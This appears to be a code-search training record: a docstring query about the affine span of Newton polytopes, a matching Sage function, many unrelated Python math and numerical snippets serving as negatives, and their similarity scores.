\" + str(p) + \")\", where=\"MultiVoigt1d::evalComponent\",\n solution=\"Use value between 1 and \" + str(self.n)))", "def resolves_matrix(self):\n self.P = np.linalg.solve(self.M, self.f)", "def cost_function(H, n_qubits, p, params):\n ini_state=plus_state(n_qubits)\n for i in range(p):\n ini_state=qaoa_step(ini_state,H,n_qubits,params=[params[2*i],params[2*i+1]])\n return ((sparse.spmatrix.getH(ini_state)).dot(H.dot(ini_state))).real, ini_state", "def ap(self, P):\n if P.divides(self.conductor()):\n if (P*P).divides(self.conductor()):\n # It is 0, because the reduction is additive.\n return ZZ(0)\n else:\n # TODO: It is +1 or -1, but I do not yet know how to\n # compute which without using the L-function.\n return '?'\n else:\n return self._S.hecke_matrix(P)[0,0]", "def evaluate_rijP(self, q):\n rP_i = self._parent._parent.bodies[self.body_id_i].evaluate_r(q, element_id=self.element_id, ksi=self.element_ksi)\n\n self.r_P_list[0] = rP_i\n\n # distance vector\n r_ij_P = rP_i - self.rP_j\n\n return r_ij_P", "def evaluate(self) -> int:", "def power(self,p):\r\n\t\t\r\n\t\t# raise to power\r\n\t\tr,o = Li._expand(self,p)\r\n\t\t\r\n\t\treturn Li(r)", "def __evaluate(self, point):\n assert len(point) == len(self.weight)-1\n result = self.weight[0]\n for i in range(0,len(point)):\n result += self.weight[i+1] * point[i]\n return result", "def _eval_coeff(self, pt):\n return sum(a.coeff(pt) for a in self.args)", "def _compute_pTable(self, expand=False, factor=False,\n simplify=False):\n if self._has(\"p\"):\n return\n if not self._has(\"k\"):\n self.kTable(expand=expand, factor=factor, simplify=simplify)\n if not self._has(\"m\"):\n self.multiplicities(expand=expand, factor=factor,\n simplify=simplify)\n p = Array3D(self._.d + 1)\n self._compute_parameters(p, self._.P, self._.m, integral=True,\n name=PARAMETER, sym=SYMBOL)\n self._.p = p\n self.check_handshake()", "def __imul__(self, s):\n val = _hypre.HypreParMatrix___imul__(self, s)\n\n # val.thisown = 0\n return self\n\n\n return val", "def _precompute_xl(self, p: int) -> List[int]:\n res = [1]\n val = 1\n for _ in range(len(self._s)):\n val = (val * self.X) % p\n res.append(val)\n return res", "def regular(P):\n try:\n dim = P.shape[0]\n q = (P - np.eye(dim))\n ones = np.ones(dim)\n q = np.c_[q, ones]\n QTQ = np.dot(q, q.T)\n bQT = np.ones(dim)\n answer = np.linalg.solve(QTQ, bQT)\n if np.all(answer > 0):\n return answer\n else:\n return None\n except Exception as e:\n return None", "def evaluate(self, point):\n result = self.__evaluate(point)\n return -1 if result < 0 else 1", "def _compute_parameters(self, p, P, m, integral=False, name=None,\n sym=None):\n for h in range(self._.d + 1):\n for i in range(self._.d + 1):\n for j in range(self._.d + 1):\n p[h, i, j] = full_simplify(\n sum(m[t] * P[t, h] * P[t, i] * P[t, j]\n for t in range(self._.d + 1))\n / (self._.n * P[0, h]))\n self._check_parameter(h, i, j, p[h, i, j],\n integral=integral,\n name=name, sym=sym)\n self._check_consistency(p, P[0], name=name, sym=sym)", "def EvaluatePosition(self, , p_float=..., p_float=..., p_float=..., *args, **kwargs):\n ...", "def solve_ilp(self):\n\n ilp_solution = pylp.Solution()\n self.ilp_solver.set_constraints(self.constraints)\n message = self.ilp_solver.solve(ilp_solution)\n print(\"ILP solved with minimal value \" + str(ilp_solution.get_value()) + \" and status \" + message)\n\n solution = lil_matrix(self.graph.shape)\n for i in range(self.num_variables):\n print(\"value of var \" + str(i) + \" is \" + str(ilp_solution.get_vector()[i]))\n if 
ilp_solution.get_vector()[i] < 0.5:\n continue\n (u,v) = self.var_to_edge[i]\n solution[u,v] = self.graph[u,v] - self.min_cost + 1\n\n return solution", "def Eval(self, r, ppar, pperp, v, gamma=None, p2=None, p=None, xi=None):\n while False:\n yield None", "def a_ij(s, p, i=1, j=1): # (Validated)\n from math import sqrt\n if i == j:\n return s.c[i]['a'] # Return pure paramater\n else: # find mixture aij i =/= j\n return (1 - p.m['k'][i][j]) * sqrt(s.c[i]['a'] * s.c[j]['a'])", "def I(x, y, l, p):\n \n return 0.5 / (mu * c) * A0**2 * ( u(x, y, l, p) )**2", "def success_p(self, input_p = None):\r\n if input_p is None:\r\n input_p = uniform_p(self.n_inputs())\r\n return np.trace(np.dot(np.diag(input_p), self.matrix))", "def compute_demand(self, p):\n \n G, h = spdiag([-1.0]*self.n), matrix(0.0, (self.n, 1))\n \n if self.type == 'quad':\n Q, r = self.data\n return solvers.qp(-Q, p-r, G, h)['x']\n\n if self.type == 'sqrt':\n def F(x=None, z=None):\n if x is None: return 0, matrix(1.0, (self.n, 1))\n u, Du, H = self.utility(x)\n f, Df = p.T*x - u, p.T - Du\n if z is None: return f, Df\n return f, Df, -z[0]*H\n return solvers.cp(F, G, h)['x']", "def mod_inv(a,p):\r\n\r\n for i in range(1,p):\r\n if (i*a)%p==1: return i\r\n raise ValueError(str(a)+\" has no inverse mod \"+str(p))", "def cost_matrix(x, y, p=2):\n xc = tf.expand_dims(x, 1)\n yr = tf.expand_dims(y, 0)\n d = tf.math.pow(tf.abs(xc - yr), p)\n return tf.reduce_sum(d, axis=-1)", "def compute_PSSM_self_information(p):\n return -sp.sum(p*sp.log(p))", "def _model(x, p):\n y_hat = 0\n for i, pi in enumerate(reversed(p)):\n y_hat += x**i * pi\n return y_hat", "def ij(ij, pol, ant) :\n s.ij(pol, ij, ant)", "def laplacian(self, p):\n wf = self._wf(p)\n return - G * self.d * wf.sum()", "def eval_function_modlin(point, level_vector, index_vector):\n\n product = 1\n for (l, i, x) in izip(level_vector, index_vector, point):\n if l == 1 and i == 1:\n val = 1\n elif l > 1 and i == 1:\n if x >= 0 and x <= 2 ** (1 - l):\n val = 2 - 2 ** l * x\n else:\n val = 0\n elif l > 1 and i == 2 ** l - 1:\n if x >= 1 - 2 ** (1 - l) and x <= 1:\n val = 2 ** l * x + 1 - i\n else:\n val = 0\n else:\n val = __phi(x * 2 ** l - i)\n product *= val\n if product == 0:\n break\n return product", "def expression(self, p):\n num_type, first, second = get_type_first_second_of_binary_operation(p.expression, p.term)\n\n opcode_type = I_for_int_R_for_float(num_type)\n opcode_action = \"ADD\" if p.ADDOP == \"+\" else \"SUB\"\n opcode = opcode_type + opcode_action\n\n temp = next(g_generate_temp_variable_name)\n temp_variables_values_dict[temp] = temp\n\n qaud_code(f\"{opcode} {temp} {first} {second}\")\n return Expression(num_type, temp)", "def m_p(Z0, P0, P):\n return m(Z0) * P/P0", "def eval(f, a, j=0):\n return f.per(dmp_eval_in(f.rep, f.dom.convert(a), j, f.lev, f.dom), lower=True)", "def p(self):\n self.pTable()", "def algorithm_1_2(p, c, x):\n\n q = np.array(c, dtype=np.float64)\n\n for k in range(1, p + 1):\n for j in range(0, p - k + 1):\n q[j] = (1 - x) * q[j] + x * q[j + 1]\n return q[0]", "def _evaluate_recur(self, p):\n if self.is_leaf(p):\n return float(p.element()) # we assume element is numeric\n else:\n op = p.element()\n left_val = self._evaluate_recur(self.left(p))\n right_val = self._evaluate_recur(self.right(p))\n if op == '+':\n return left_val + right_val\n elif op == '-':\n return left_val - right_val\n elif op == '/':\n return left_val / right_val\n else:\n return left_val * right_val # treat 'x' or '*' as multiplication", "def _evaluate(self, x):\n raise 
NotImplementedError()", "def perplexity(self):\n raise NotImplementedError(\"To be implemented\")", "def _pfunc(i,j,perm):\n if perm[i-1] == j:\n return 1\n else:\n return 0", "def P(self):\n self.eigenmatrix()", "def return_policy_evaluation(self, p, u, r, T, gamma):\n for s in range(0, self.env.observation_space.n):\n if not np.isnan(p[s]):\n v = np.zeros((1, self.env.observation_space.n), dtype=float)\n v[0, s] = 1.0\n action = int(p[s])\n u[s] = r[s] + gamma * np.sum(np.multiply(u, np.dot(v, T[:, :, action])))\n return u", "def polyeval(self, x):\n return NotImplemented", "def _evaluate_recur(self, p):\n if self.is_leaf(p):\n return float(p.element()) # we assume element is numeric\n else:\n op = p.element()\n left_val = self._evaluate_recur(self.left(p))\n right_val = self._evaluate_recur(self.right(p))\n if op == '+':\n return left_val + right_val\n elif op == '-':\n return left_val - right_val\n elif op == '/':\n return left_val / right_val\n else: # treat 'x' or '*' as multiplication\n return left_val * right_val", "def apply(self, point):\r\n return self*point", "def evaluate(self, p: Posting) -> Union[str, None]:\n return self.eval_fn(p)", "def _get_Pij(self): \n \n with tf.name_scope(\"getting_Pij\"):\n \n n_splits = int(self.dim_input / self.per_split_feats)\n n_divisible = n_splits * self.per_split_feats\n X_split = tf.split(self.X_transformed[:,0:n_divisible], n_splits, axis=1)\n X_split.append(self.X_transformed[:,n_divisible:])\n \n # get norm along first feature set\n normAX = X_split[0][None, :, :] - X_split[0][:, None, :]\n normAX = tf.reduce_sum(normAX ** 2, axis=2)\n \n for split in range(1, len(X_split)): \n \n # Expand dims of AX to [n_samples, n_samples, n_features], where\n # each \"channel\" in the third dimension is the difference between\n # one sample and all other samples along one feature\n norm_thisFeatureSet = X_split[split][None, :, :] - \\\n X_split[split][:, None, :]\n \n norm_thisFeatureSet = tf.reduce_sum(norm_thisFeatureSet ** 2, axis=2)\n \n # add to existing cumulative sum \n normAX = normAX + norm_thisFeatureSet\n \n # Calculate Pij, the probability that j will be chosen \n # as i's neighbor, for all i's. 
Pij has shape\n # [n_samples, n_samples] and ** is NOT symmetrical **.\n # Because the data is normalized using softmax, values\n # add to 1 in rows, that is i (central patients) are\n # represented in rows\n denomSum = tf.reduce_sum(tf.exp(-normAX), axis=0)\n epsilon = 1e-50\n denomSum = denomSum + epsilon \n \n self.Pij = tf.exp(-normAX) / denomSum[:, None]", "def p0(self, p0):\n u = self.p0 - self.p1\n v = p0 - self.p1\n scale, rM = self.scale_rot_matrix(u, v)\n self.c = self.p1 + rM @ (self.c - self.p1)\n self.r *= scale\n self.r2 = self.r * self.r\n dp = p0 - self.c\n self.a0 = atan2(dp.y, dp.x)", "def _re(self, p):\n return self.edges[:, 0, :] - p # 0 is arbitrary - the other end also works", "def evaluate_cost(\n self, x: Dict[str, ArrayType], p: Dict[str, ArrayType]\n ) -> CasADiArrayType:\n x = self.opt.decision_variables.dict2vec(x)\n p = self.opt.parameters.dict2vec(p)\n return self.opt.f(x, p)", "def pe_solver(Aij, Bij, pi):\n # =========================================================================\n # Calculating the pressure at row i + 1\n # =========================================================================\n return np.dot(np.linalg.inv(Aij), np.dot(Bij, pi))", "def flipy(self, p):\n return int(p.x), int(-p.y+self.h)", "def inv(P):\n L = cho_factor(P)\n return cho_solve(L, np.eye(P.shape[0]))", "def EvaluateFunction(self, p_float=..., p_float=..., p_float=...):\n ...", "def evaluate(self, state):\n abstract", "def f(t,x,p,q):\n return p[1] + q[0]*x", "def __call__(self, xi, p=None):\n\n # print('basis function is called {0}, {1}'.format(xi, p))\n\n return self.__basis(xi, self.p if p is None else p)", "def __pow__(self, power):\n if type(power) is not int:\n return NotImplemented\n if not self.isSquare():\n raise ValueError(\"Power invalid for non-square matrices\")\n if power > 0:\n p = power\n returnvalue = Matrix(self)\n elif power < 0:\n p = -power\n returnvalue = self.inverse()\n elif power == 0:\n return NotImplemented\n for i in range(p - 1):\n returnvalue *= returnvalue\n return returnvalue", "def mat24_perm_to_int(p):\n oct = sum(1 << x for x in p[:8])\n res = gc.vect_to_octad(oct) \n #print(\"p2i oct\", hex(oct))\n res -= STD_OCTAD\n res += (res >> 12) & 759 \n #print(\"p2i\", res)\n p1 = [24]*32\n oct, j = 8 * oct, 0x00 \n for i in range(24):\n o = oct & 8\n p1[i] = (j >> o) & 0x1f\n j += 1 << o\n oct >>= 1\n q, q_inv = [None]*8, [None]*8\n for i in range(8):\n j = p1[p[i] & 0x1f] & 7\n q[j] = i\n q_inv[i] = j\n for i in range(6):\n # exchange place i with place q_inv[i]\n j = q_inv[i]\n #q_inv[q[i]], q_inv[q[j]] = q_inv[q[j]], q_inv[q[i]]\n #q[i], q[j] = q[j], q[i]\n #assert q[:i] == q_inv[:i] == lrange(i)\n q_inv[q[i]] = q_inv[q[j]]\n q[j] = q[i]\n #print(\"p2i%d\" % i, j-i) \n res = res * (8 - i) + j - i\n #print(\"p2ifinal\", p1[p[8] & 0x1f]) \n return 16 * res + p1[p[8] & 0x1f]", "def computeSPPMI_matrix(P, shifted_k: int, check_sym = True):\n a, b = P.shape\n # print P.shape, type(P)\n P = np.asarray(P)\n # print 'Shape of P: ', P.shape\n assert a == b\n D = np.sum(P)\n cols = np.sum(P, axis = 0) # sum the columns (b,)\n rows = np.sum(P, axis = 1, keepdims=True) # sum the row (a,1)\n P = P / (cols + 1e-10)\n P = P / (rows + 1e-10)\n P = P * D\n PMI = np.log(P + 1e-10)\n S = PMI - np.log(shifted_k)\n mask = S > 0\n SPPMI = np.multiply(S, mask)\n assert np.min(SPPMI) == 0\n if check_sym: np.fill_diagonal(SPPMI, 0) # in-place operation\n assert torch_utils.check_symmetric(SPPMI) == True\n return SPPMI", "def p2f (p):\n #return 11000**((p+1)/2)\n 
#return (p+1)*11000\n return (p+1)*5500", "def __init__ (self, p, q):\n self.n = p * q\n self.n_sq = self.n * self.n\n self.g = self.n + 1", "def evaluate( self, x ) :\n\n P = 0.\n for c_l in reversed( self.coefficients ) : P = c_l + x * P\n return( P )", "def apply_pt(self, x_pt, y_pt):\n return ( self.matrix[0][0]*x_pt + self.matrix[0][1]*y_pt + self.vector[0],\n self.matrix[1][0]*x_pt + self.matrix[1][1]*y_pt + self.vector[1] )", "def normIP(p):\n z = normIQ(1.0 - p)\n return z + (p - normP(z)) / normZ(z)", "def evaluationFunction(self, currentGameState, action):\n successorGameState = currentGameState.generatePacmanSuccessor(action)\n return scoreEvaluationFunction(successorGameState)", "def test_indexed_increment(self, expr, result):\n j, l = dimify('j l')\n a = symbol(name='a', dimensions=(j, l), value=2., mode='indexed').base\n fa = a.function\n fa.data[1:, 1:] = 0\n\n eqn = eval(expr)\n Operator(eqn)(fa)\n assert np.allclose(fa.data, result, rtol=1e-12)", "def _P(m):\n P = np.zeros((m**2,m**2), dtype=np.int64)\n for i in range(1, m**2 + 1):\n j = 1 + m*((i - 1) % m) + (i - 1)//m\n P[i-1, j-1] = 1\n return P", "def __call__(self, t=1 / 2):\n return (t * self.vector)(self.p1)", "def _phi_int(self, x, d, p):\n ks = np.arange(self.p + 1)\n ks = ks[np.where(2 * (self.p - ks) - d >= 0)][:, np.newaxis]\n return np.sum(\n binom(self.p, ks)\n * (-1) ** ks\n * x[np.newaxis, :] ** (2 * (self.p - ks) - d + 1)\n * perm(2 * (self.p - ks), d)\n / (2 * (self.p - ks) - d + 1),\n axis=0,\n )", "def _query(self, p, k):\n if isinstance(p, int):\n if k >= len(self._table[p]):\n return None\n return self._table[p][k]\n\n # if k > self._tree.depth(p):\n if k >= len(self._table[p.index()]):\n return None\n return self._table[p.index()][k]", "def _pij(i: int, j: int):\n ia = i * 2 + 0\n ib = i * 2 + 1\n ja = j * 2 + 0\n jb = j * 2 + 1\n term1 = FermionOperator(((ja, 0), (ib, 0)), 1.0)\n term2 = FermionOperator(((ia, 0), (jb, 0)), 1.0)\n return numpy.sqrt(0.5) * (term1 + term2)", "def moment(self, p, q):\n\n def combin(n, r):\n # compute number of combinations of size r from set n\n def prod(values):\n try:\n return reduce(lambda x, y: x * y, values)\n except TypeError:\n return 1\n\n return prod(range(n - r + 1, n + 1)) / prod(range(1, r + 1))\n\n vertices = self.vertices(closed=True)\n x = vertices[0, :]\n y = vertices[1, :]\n\n m = 0.0\n n = len(x)\n for l in range(n):\n l1 = (l - 1) % n\n dxl = x[l] - x[l1]\n dyl = y[l] - y[l1]\n Al = x[l] * dyl - y[l] * dxl\n \n s = 0.0\n for i in range(p + 1):\n for j in range(q + 1):\n s += (-1)**(i + j) \\\n * combin(p, i) \\\n * combin(q, j) / ( i+ j + 1) \\\n * x[l]**(p - i) * y[l]**(q - j) \\\n * dxl**i * dyl**j\n m += Al * s\n\n return m / (p + q + 2)", "def _renorm_p(self, p):\n return np.sign(p)*np.sqrt(np.sqrt(np.abs(p)))", "def optimizer_array(self, p):\n f = None\n if self.has_parent() and self.constraints[__fixed__].size != 0:\n f = np.ones(self.size).astype(bool)\n f[self.constraints[__fixed__]] = FIXED\n elif self._has_fixes():\n f = self._fixes_\n if f is None:\n self.param_array.flat = p\n [np.put(self.param_array, ind, c.f(self.param_array.flat[ind]))\n #py3 fix\n #for c, ind in self.constraints.iteritems() if c != __fixed__]\n for c, ind in self.constraints.items() if c != __fixed__]\n else:\n self.param_array.flat[f] = p\n [np.put(self.param_array, ind[f[ind]], c.f(self.param_array.flat[ind[f[ind]]]))\n #py3 fix\n #for c, ind in self.constraints.iteritems() if c != __fixed__]\n for c, ind in self.constraints.items() if c != __fixed__]\n 
#self._highest_parent_.tie.propagate_val()\n\n self._optimizer_copy_transformed = False\n self.trigger_update()", "def gini_scorer(a,p):\n\n return gini_normalized(a,p[:,1])", "def square_func(i, T, amp, p = 10000):\n if (i//p)%2 == 0:\n return T + amp\n else:\n return T - amp", "def polyval(p, x):\r\n val = 0\r\n ii = len(p) - 1\r\n for i in range(len(p) - 1):\r\n val += p[i] * (x ** ii)\r\n ii -= 1\r\n return val + p[-1]", "def fun_lorentzian(p,r):\n return p[1] / ((r/p[0])**2 + 1)", "def pvector_pp(i, q):\n\tc0 = coords_cut[i]\n\tra, dec = c0.ra.value, c0.dec.value\n\tr = hp.rotator.Rotator([ra, dec, 0])\n\tsT = np.matmul(r.mat, np.matmul(s_tensor_cut[:,:,i], r.mat.transpose()))\n\tevals, evecs = np.linalg.eigh(sT[1:,1:])\n\tevecA, evecB = evecs[:,0], evecs[:,1]\n\tif evecB[0] < 0:\n\t\tevecB = -evecB\n\ttheta = np.arctan2(evecB[1], evecB[0])\n\tres = 180*theta.item()/np.pi, i\n\tq.put(res)\n\treturn res", "def _xphi_int(self, x, d, p):\n ks = np.arange(self.p + 1)\n ks = ks[np.where(2 * (self.p - ks) - d >= 0)][:, np.newaxis]\n return np.sum(\n binom(self.p, ks)\n * (-1) ** ks\n * x[np.newaxis, :] ** (2 * (self.p - ks) - d + 2)\n * perm(2 * (self.p - ks), d)\n / (2 * (self.p - ks) - d + 2),\n axis=0,\n )", "def p_m(pmx_c,px):\n pm = np.zeros(pmx_c.shape[0])\n for mi in range(pm.size):\n for xi in range(px.size):\n pm[mi] += pmx_c[mi,xi]*px[xi]\n return pm", "def solution(n,p):\n \n a=pow(n, (p - 1) // 2, p)\n if(a==1):\n return True\n else :\n return False", "def p1(self, p1):\n p0 = self.p0\n u = self.p1 - p0\n v = p1 - p0\n\n scale, rM = self.scale_rot_matrix(u, v)\n self.c = p0 + rM @ (self.c - p0)\n self.r *= scale\n self.r2 = self.r * self.r\n dp = p0 - self.c\n self.a0 = atan2(dp.y, dp.x)", "def prim_method(self):", "def prim_method(self):", "def _init_eigenmatrix(self, P):\n self._.d = nrows(P) - 1\n assert all(len(r) == self._.d + 1 for r in P), \\\n \"parameter length mismatch\"\n P = Matrix(SR, P)\n for i, x in enumerate(P[0]):\n P[0, i] = integralize(x)\n self._.n = sum(P[0])\n return P", "def get_abscissa(self, p):\n return np.dot(p - self.zero, self.direction)", "def P_i(self, alpha, Q, X_data):\n X_lin_comb = np.dot(alpha, X_data)\n Pi = Q * np.exp(X_lin_comb - X_lin_comb.max(initial=0))\n Pi = Pi / Pi.sum()\n return Pi", "def evaluatePolicy_SolvingSystemOfLinearEqs(self, policy):\n\n V = np.zeros(self.nStates)\n # loop\n for state in range(self.nStates):\n # value to 0\n v = 0\n action = np.argmax(policy[:, state])\n for next_state, prob in enumerate(self.T[action][state]):\n v += prob * (self.R[action][state] + self.discount * V[next_state])\n V[state] = v\n return V", "def eval_prior(self, state, action):\n\n return np.dot(state, self.a.T) + np.dot(action, self.b.T)", "def _evaluate(self, x, return_indices=False):\n return self._evalOrDer(x, True, False)[0]", "def _evaluate(self, index):\n raise NotImplementedError", "def set_expansion_steps(self, p):\n p = int(p)\n if p <= 0:\n raise ValueError(\n 'Integer must be greater than zero (to limit the interval size'\n ' to (2 ** integer) * width).')\n self._p = p", "def algorithm_1_1(p, c, t, x):\n\n q = np.array(c, dtype=np.float64)\n\n for k in range(1, p + 1):\n for j in range(0, p - k + 1):\n q[j] = (t[j + k] - x) / (t[j + k] - t[j]) * q[j] + (x - t[j]) / (\n t[j + k] - t[j]) * q[j + 1]\n return q[0]" ]
[ "0.6590414", "0.64902985", "0.5803352", "0.576456", "0.56841123", "0.56735307", "0.5545928", "0.54923505", "0.54681116", "0.5413606", "0.5399578", "0.5339681", "0.5316676", "0.53084254", "0.5288867", "0.525981", "0.52447516", "0.5244498", "0.5217221", "0.521235", "0.5206362", "0.5195178", "0.51789606", "0.51632947", "0.5100213", "0.5087714", "0.5081258", "0.5078931", "0.5053198", "0.5036393", "0.5028569", "0.5026325", "0.5006044", "0.50043327", "0.50035065", "0.49929", "0.4988843", "0.49867758", "0.4965937", "0.4960121", "0.49469024", "0.49428186", "0.49421504", "0.49393705", "0.49109876", "0.49095565", "0.49022937", "0.48998582", "0.48952553", "0.48780093", "0.48776975", "0.48700348", "0.48700204", "0.486586", "0.48640615", "0.48609558", "0.48577482", "0.48563483", "0.48547348", "0.48444352", "0.48281825", "0.48280936", "0.48252603", "0.48018655", "0.47849703", "0.47845882", "0.4782678", "0.47798303", "0.4769205", "0.47675377", "0.4761075", "0.47494498", "0.47493553", "0.4743193", "0.47419637", "0.47397158", "0.47369513", "0.47263083", "0.47255614", "0.4724568", "0.47204784", "0.47195882", "0.47183186", "0.47121957", "0.47072968", "0.47068492", "0.47050366", "0.47007012", "0.46976492", "0.4692514", "0.4692514", "0.46919358", "0.4689712", "0.46852478", "0.46752906", "0.4671883", "0.46674138", "0.4664621", "0.46615413", "0.46550694" ]
0.6615458
0
r""" Return the dimension of the affine space spanned generated by each Newton polytopes. for triangular matrices, seems to stay 0 on the diagonal.
def get_vector_span(self, i, j):
    from sage.rings.infinity import Infinity
    from sage.matrix.constructor import matrix
    data = self[i,j]
    if not data:
        return None
    elif len(data) == 1:
        return FreeModule(ZZ, self._nvars).submodule([])
    else:
        return matrix([x-data[0] for x in data]).row_space()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def dim(self) -> int:", "def getlen(self):\n if self.onlydiag():\n return self.lendiag()\n else:\n return len(self)", "def dimension(self):\n return 3*self.genus - 3 + self.n", "def dim(self) -> int:\n return self.atoms.shape[:-1]", "def dimension(self):\r\n a = 0\r\n for x in self.faces():\r\n if (len(x) > a):\r\n a = len(x) \r\n return a-1", "def diagonal_size(self):\n b = self.GetBounds()\n return np.sqrt((b[1] - b[0]) ** 2 + (b[3] - b[2]) ** 2)", "def n_dim(self):\n return self._n_dim", "def shape(self) -> (int,int):\n return (len(self.mat), len(self.mat[0]))", "def matrix_dim(CT):\r\n if CT[0]==0 and CT[-1]==0:\r\n return 2\r\n elif CT[0]!=0 and CT[-1]!=0:\r\n return 4", "def __len__(self):\n return np.size(self.A,0)", "def Nx(self):\n return self.shape[-1]", "def dim(self) -> int:\n pass", "def __len__(self):\n return self.N.shape[0]", "def dimensionality(self):\n return int(self.nDims)", "def nplex(self):\n return self.shape[1]", "def dim(self):\n return self.m, self.n", "def my_dimension(self) -> Nat:\n my_part = self.my_diagram.as_list()\n sum_phat_sq = sum((z*(2*i+1) for (i, z) in enumerate(my_part)))\n dimension = 0\n num_odd_parts = sum((z % 2 for z in my_part))\n if self.my_type is LieType.A:\n dimension = (self.lie_rank+1)**2 - sum_phat_sq\n elif self.my_type is LieType.D:\n dimension = 2*(self.lie_rank**2) - self.lie_rank - \\\n sum_phat_sq//2 + num_odd_parts//2\n elif self.my_type is LieType.B:\n dimension = 2*(self.lie_rank**2) + self.lie_rank - \\\n sum_phat_sq//2 + num_odd_parts//2\n elif self.my_type is LieType.C:\n dimension = 2*(self.lie_rank**2) + self.lie_rank - \\\n sum_phat_sq//2 - num_odd_parts//2\n else:\n raise ValueError(\n \"Lie type must be one of the 4 classical families\")\n return dimension", "def size(adj_mat):\n return adj_mat.shape[0]", "def n_thres(self):\n return np.size(self.thres)", "def number_of_basis(self):\n return self._pre_kernel.shape[0]", "def get_zdim(self):\n return self.decoder.get_input_info_dict()['latent_vector'].get_shape()[1]", "def nNx(self):\n return self.nCx + 1", "def InferSpatialDimension(self):\n\n assert self.points is not None\n # if self.points.shape[1] == 3:\n # if self.element_type == \"tri\" or self.element_type == \"quad\":\n # print(\"3D surface mesh of \", self.element_type)\n\n return self.points.shape[1]", "def size(self)->int:\n\n return np.prod([axes if is_integer(axes) else len(axes) for axes in self._dim_axes])", "def dimensionality(self):\n if self.vector.shape is ():\n return 0\n if len(self.vector.shape) is 1:\n return 1\n _, dim = self.vector.shape\n return dim", "def dim(self):\n return len(self.shape)", "def dim(self):\n return len(self.shape)", "def nspatials(self):\n return int(len(self)/2)", "def numel(self):\n return self.t.size", "def dims(x):\n return len(x.shape)", "def element_size(self):\n vecs = (\n self.nodes[self.elements[:, :4], :][:, 1:, :]\n - self.nodes[self.elements[:, :4], :][:, 0, None, :]\n )\n return np.abs(np.linalg.det(vecs)) / 6", "def dim(self):\n return len(self._n)", "def flat_dim(self):\n return np.sum([c.flat_dim for c in self.spaces])", "def nNy(self):\n if self.dim < 2:\n return None\n return self.nCy + 1", "def ndims(x):\n return len(x.get_shape())", "def dim(self) -> int:\n return self._n_dim", "def size(self):\n return int(misc.intprod(self.shape))", "def dim(self):\n return self.ambient_dim() - self.n_equations()", "def getdim(self):\n return round(self.w() / self.c)", "def columns(self) -> int:\n return self.__squares[0].__len__()", "def n_dims(self):\n return 
self.pdm.n_dims", "def dimension(self):\n return self.__N", "def __len__(self):\n return self.n_node.shape[0]", "def __len__(self) -> int:\n\n return self.layout.gaDims", "def getNpol(self):\n return self.shape(squeeze=False)[1]", "def calculate_dimensions(self):\n x_coordinates = np.sort(self.grid['x'][:, 0]) # first x node\n self.nr_nodes_z = np.where(x_coordinates == x_coordinates[0])[0].size\n self.nr_elements_x = self.elements.shape[0] / (self.nr_nodes_z - 1)\n self.nr_nodes_x = self.nr_elements_x + 1\n self.nr_elements_z = self.nr_nodes_z - 1", "def get_grid_width(puzzle: str) -> int:\r\n return int(len(puzzle) ** (1 / 2))", "def get_in_dim(self) -> int:\n return self.in_dim", "def dim(self):\n if '_dim' in self.__dict__:\n return self._dim\n\n if len(self._Vrepresentation)==0:\n self._dim = -1\n return self._dim\n\n origin = vector(self._Vrepresentation[0])\n v_list = [ vector(v)-origin for v in self._Vrepresentation ]\n self._dim = matrix(v_list).rank()\n return self._dim", "def dim(self) -> tuple:\n if self.has_tensor(): return self.as_tensor().dim()\n else:\n return tuple(list(self[0].dim()[0]) + [len(self)]), self[0].dim()[1]", "def get_dims(self):\n row_lbl, col_lbl = self.get_idxvals()\n return len(row_lbl), len(col_lbl)", "def size(self):\r\n # Anthony stage 2\r\n return number_size(self.n) - 1", "def n_dims(self):\n return len(self.dimensions)", "def __len__(self):\n return self.flatten_dim(self.shape[0])", "def size(self):\n\t\treturn self.dims", "def nvar(self):\n return self.h.shape[0]", "def nD(self):\n return self.locations[0].shape[0]", "def __len__(self):\n return self.xyz.shape[0]", "def __len__(self):\n return self.xyz.shape[0]", "def N(self):\n return _hypre.HypreParMatrix_N(self)", "def xdim(self):\n return len(self._x)", "def nNz(self):\n if self.dim < 3:\n return None\n return self.nCz + 1", "def dimensions():", "def width(self):\n return self.board.shape[1]", "def outdim(self):\n return len(self.getSensors())", "def width(self) -> int:\n return self._obj[self.x_dim].size", "def dim(self) -> Tuple[Tuple[int, int], Tuple[int, int]]:", "def _get_parameter_count(self):\n parameters_d = 5;\n size_h = self.model.size_h\n return (size_h - 1) + size_h * (\n (size_h - 1) + parameters_d + (self.model.size_aa - 1) + \n (self.model.size_ss - 1) + (self.model.size_cis - 1)\n )", "def __len__(self) -> int:\n\n return self.shape.shape[1]", "def inertia(mus):\n pos, negs, zeros = cluster_eignvalues(mus)\n\n return len(zeros) + min(len(pos), len(negs))", "def dim_M(self):\n assert 'M' in self.dp\n return np.sqrt(self.f1*self.f2*self.f3**3)*self.dT**2*self.dp.M", "def n_dims(self):\n return self.model.template_instance.n_dims", "def dimension(self):", "def numpoints(self):\n return len(self.pars) + 1 # so dof is 1", "def nD(self):\n return self.locations.shape[0]", "def dim(self) -> tuple:\n if self.expr_list: return (self.expr_list[0].size()[0], len(self.expr_list)) + self.expr_list[0].size()[1:]\n elif self.expr_tensor is not None: return self.expr_tensor.size()\n elif self.expr_transposed_tensor is not None:\n return (self.expr_transposed_tensor.size()[1], self.expr_transposed_tensor.size()[0]) + self.expr_transposed_tensor.size()[2:]\n else:\n raise NotImplementedError()", "def dim_calculator():\r\n probe_set = np.arange(1, 101)\r\n X = -36 + ((probe_set - 1) // 10) * 4\r\n Y = 2 - ((probe_set - 1) % 10) * 4\r\n dim = np.vstack((X, Y)).T\r\n return dim", "def size(self) -> int:\n return int(np.multiply(*self.shape))", "def size(self):\n if type(self._shape).__name__ == 
